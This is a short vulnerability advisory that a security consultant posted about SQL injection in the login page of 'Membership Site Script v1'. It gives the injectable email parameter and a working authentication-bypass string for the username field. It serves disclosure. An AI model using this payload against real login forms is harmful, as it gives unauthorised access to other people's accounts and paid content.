################################################ #Title: Membership Site Script v1 - SQL injection #Credit: Bilal KARDADOU #Vendor: http://www.turnkeycentral.com #Vendor URL: http://www.turnkeycentral.com/scripts/membership-site-script/ #Product: Membership Site Script v1 #Google Dork: N/A ################################################ # # Product & Service Introduction: # # "Membership Site Script" # Do you want to Launch Your Own Membership Site That Grows Automatically on AutoPilot? With a membership site, # your customers sign up and pay a monthly fee to gain access to special, private, members-only content. # The content might be eBooks, scripts, articles, graphics, coaching audio or video a whatever you want. # # http://localhost/membershipscript/login.php # submit=1&email=demo@gmail.com[SQL]&password=123456 # # # Authentication Bypass : # http://localhost/membershipscript/login.php # Username: test@test.com 'or''=' # Password: [empty] # # PoC: # http://prnt.sc/en4u2s # http://prnt.sc/en4tze # Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################ -- *Bilal Kardadou* IT Security Consultant *E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |